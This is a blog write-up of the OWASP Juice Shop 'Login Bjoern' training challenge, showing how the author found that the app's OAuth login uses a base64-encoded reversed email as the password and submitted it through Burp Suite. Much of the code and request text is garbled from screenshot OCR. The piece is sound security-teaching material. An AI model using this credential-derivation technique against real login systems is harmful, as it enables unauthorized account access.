Information Security

Hacking OWASP’s Juice Shop Pt. 54: Login Bjoern

Posted on by codeblue04

Challenge: 

Name: Login Bjoern

Description: Log in with Bjoern’s Gmail account without previously changing his password, applying SQL Injection, or hacking his Google account.

Difficulty: 4 star

Category: Broken Authentication

Expanded Description: https://pwning.owasp-juice.shop/part2/broken-authentication.html

Tools used:

Burp Suite

Resources used:

https://mothereff.in/reverse-string

Methodology: 

This was a fun, CTF-type challenge. The expanded description talks about Oauth at length, so I began by looking for any reference to it in the main javascript file.

Shop$ cat main.js I grep "oauth" Login(t) { oauth return this.http.get( "https•.//wm.googleapis.com/ oauth this. userservice. oauth oauth: ["app -oauth" this.configurationservice = t, this.usersewice = e, this.windowRefSewice = a, this.cookiesewice = i, this.r [c.y.required]), this .passwordControl = new c. outer = o, this.formsubmitsewice = n, this.ngzone = r, this .emailcontrol = new c.d("", [c.y.required]), this.hide = this.rememberMe = new c.d( !1), this.clientld = " d("", 1005568560502-6hm161ef80h46hr2d98vf20h1nj4nfhq. apps.googleusercontent.com", this. oauthUnavailable = !ø, this.redirectUri = e ? (this.oauthUnavailable = !1, this.redirectUri = e.proxy ? e.proxy : e.uri) : (this.oauthUnavailabl e = !ø, console.log(this.redirectUri + " is not an authorized redirect URI for this application. this. wi ndowRefSewice. nati vewindow. location. replace( https ://accounts.google.com/o/ oauth this. clientld . redirectUri} ) i.Tb(23, "mat-icon"), i.Hc(24, " exit_to_app "), i.sb(), i.Hc(25), i.fc(26, "translate"), i.sb(), i.Tb(27 15), i.Hc(28), i.fc(29, 17), i.Tb( , "mat-checkbox" , "translate"), i.Sb(), i.Fc(30, fa, 7, ø, "div", 16), i.Fc(31, sa, 4, 3, "button" 18), i.Tb(33, "a", 19), i.Hc(34, "NO_CUSTOMER"), i.Sb(), i.Sb(), i.Sb(), i.Sb(), i.Sb()), 28 t 88 (i.Bb(4), e "div", 32, .error), i.Bb(5), e.emailcontrol), i.Bb(2), i.kc("nglf", e.emailcontrol.invalid), i.Bb(4), e.p e.hide ? "password" : "text"), i.Bb(2), i.kc("nglf", e.hide), i.Bb(1), i.kc("nglf", !e.hide), i.Bb(1), i.kc("n asswordControl "type" , e.passwordcontrol.invalid), i.Bb(3), !e.emailcontrol .value !e.passwordControl .value), i.Bb(3), i.Jc(" i.g gif" , "BTN_LOGIN ), " " " ) , i. Bb(2), i. "formControl " , e.rememberMe), i.Bb(1), i.Jc(" " , i.gc(29, 16, "REMEMBER_ME ) " " ), i.Bb(2 c(26, 14, ), i.kc("nglf", 'e Unavailable), i.Bb(1), i.kc( "nglf", !e.oauthUnavailable)) . oauth Colbyakali :-/Hack/Juice Shop$

Ok, there are enough references there to warrant a deeper look, so I dug into the code until I came across the login function.

class constructor(t, e, a, i, this.cookiesewice = t ngonlnit() { this.usersewice = e this. router Login( this . usersewice. oauth let s. userservice. save({ email: t.email, password: e, passwordRepeat: e }).subscribe(() { s. login(t) login(t)) this. . invalidatesession(t) , this login(t) { . usersewice this email: t.email, password: oauth: let = new Date; e.setHours(e.getHours() + . invalidatesession(t) , this this .route = i, this this.ngZone = o . router. navigate( (login" ngzone.run(() this. . reverse this. cookiesewice. set( "token" , this t. token, e, . router. navigate( (login" localstorage. setl ngzone.run(() this.
login(t) { . usersewice. this email: t.email, password: btoa(t.email.split("").reverse().join("")) oauth:

 While other code obfuscation in this file consists of one or two letters, “btoa” didn’t quite fit that mold, so I googled it.

developer.mozilla.org en-US docs Web API WindowOrWorkerGlobalScope.btoa() - Web APIs I MDN Aug 25, 2020 — The WindowOrWorkerGlobalScope.btoa() method creates a 8ase64-encoded ASCII string from a binary string (i.e„ a String object in which .

If btoa() is just a base64 encoding function, and it is just encoding a reversed string consisting of the user’s email address, then let’s go ahead and do just that.

Reverse a string Input bjoern . kimminich@gmail . com Reversed result ( permalink ) moc . liamg@hcinimmik. nreoj b
Dashboard Target Intruder Repeater Sequencer Decoder HIT P history WebSockets history Options Request to http://localhost:3000 [127 001] Para ms Headers Comparer Open Browser Raw An Pretty •Actions POST /rest/user/login HTTP/I.I Host: local host 3000 User-Agent: MoziIIa/S.O (X 11; Linux x86 64; application/ j son, text/ plain, Accept Accept -Language: en-lJS, en; q=O.S Accept -Encoding: gzip, deflate Content -Type: application/ j son Content -Length: 88 Origin: http• // I Ocal host 3000 Connection: close Referer: http // I Ocal host 3000/ rv.78.o) Gecko,'20100101 Firefox,'7; Cookle: language=en; welcomebanner status=dismiss; email 'bjoern.kimminich@gmail . com", passwo rd' " bR9j LmxpYWInQGhj aRSpbRIpaySucmVvamIK cookleconsent status=dismi:

But it didn’t work. After all that sleuthing, the password didn’t work. I double and triple checked every character in the email address, made sure the reversing method was functioning properly, and finally tried to encode the string using Burp Suite’s Decoder.

Burp Project Intruder Repeater Dashboard Target Proxy moeliamg@hcinimmiknreojb Window Intruder Help Logger++ H IT P Request Smuggle Repeater Sequencer bW9JLmxpYWInQGhjaW5pbWIpay5ucmVvamI=

What’s this? A different character at the end of the encoded string? Let’s give it a shot!

You successfully solved a challenge: Login Bjoern (Log in with Bjoern's Gmail account without previously changing his password, applying SQL Injection, or hacking his Google account.) x

Prevention and Mitigation Strategies:

OWASP Authentication Cheat Sheet

Leave a Reply

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Cancel

Connecting to %s